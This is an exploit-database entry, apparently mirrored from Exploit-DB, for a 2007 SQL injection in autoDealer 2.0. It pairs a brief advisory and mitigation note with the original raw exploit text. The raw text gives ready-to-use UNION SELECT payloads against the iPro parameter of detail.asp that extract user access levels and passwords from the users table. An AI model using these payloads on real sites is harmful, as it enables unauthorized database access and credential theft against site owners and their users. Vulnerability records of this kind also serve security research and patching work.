header-logo
Suggest Exploit
vendor:
autoDealer
by:
ajann
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: autoDealer
Affected Version From: autoDealer <= 2.0
Affected Version To: autoDealer <= 2.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown
2007

autoDealer <= 2.0 (iPro) Remote SQL Injection Vulnerability

The autoDealer version 2.0 (iPro) is vulnerable to a remote SQL injection attack. An attacker can exploit the vulnerability by injecting malicious SQL code in the 'iPro' parameter in the 'detail.asp' page. This allows the attacker to manipulate the SQL query and retrieve sensitive information from the database. An example of a payload is 'detail.asp?iPro=-1%20union%20select%200,0,U_ACCESS,0%20from%20users'.

Mitigation:

The vendor should release a patch or update to fix the SQL injection vulnerability. In the meantime, users can mitigate the risk by implementing input validation and parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  autoDealer <= 2.0 (iPro) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.aspsiteware.com
# $$      :  $60.00

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//detail.asp?iPro=[SQL]

Example:

//detail.asp?iPro=-1%20union%20select%200,0,U_ACCESS,0%20from%20users
//detail.asp?iPro=-1%20union%20select%200,0,U_PASSWORD,0%20from%20users

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-01]